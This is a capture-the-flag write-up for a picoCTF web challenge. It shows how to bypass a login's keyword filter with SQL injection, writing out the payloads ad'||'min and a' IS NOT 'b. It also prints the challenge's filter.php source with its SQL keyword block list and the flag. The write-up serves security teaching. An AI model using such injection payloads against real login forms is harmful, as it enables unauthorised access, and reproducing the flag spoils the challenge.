This website looks familiar... Log in as admin Site: http://mercury.picoctf.net:26215/ Filter: http://mercury.picoctf.net:26215/filter.php
The challenge gives us a link which opens a webpage allowing us to login with a username and password that we can deduce are vulnerable to SQL injections. Looking at the filter link we can see what we must avoid when crafting our SQL injection.
We know that the username field must be "admin" but unfortunately this is filtered. To bypass this we can simply use the "||" joiner with a final value for the username field of "ad'||'min".
For the password field we must simply provide something that returns true. The most common one used is "' OR '1'='1" but OR is filtered as seen in the filter.php file. Instead we can craft a true statement using IS or IS NOT such as "a' IS NOT 'b" which is also true but does not use anything in the filter.php file.
Final values for login:
username: ad'||'min
password: a' IS NOT 'b
Using these to login we get the message "Congrats! You won! Check out filter.php". Finally reloading the http://mercury.picoctf.net:26215/filter.php page gives us this source code with the flag:
<?php
session_start();
if (!isset($_SESSION["winner2"])) {
$_SESSION["winner2"] = 0;
}
$win = $_SESSION["winner2"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
if ($view) {
echo "Filters: ".implode(" ", $filter)."<br/>";
}
} else if ($win === 1) {
if ($view) {
highlight_file("filter.php");
}
$_SESSION["winner2"] = 0; // <- Don't refresh!
} else {
$_SESSION["winner2"] = 0;
}
// picoCTF{0n3_m0r3_t1m3_fc0f841ee8e0d3e1f479f1a01a617ebb}
?>Note: If you successfuly ran the SQL injection but still see nothing in the filter.php file try clearing cache and then reloading or using a different browser to get the source code with flag.
picoCTF{0n3_m0r3_t1m3_fc0f841ee8e0d3e1f479f1a01a617ebb}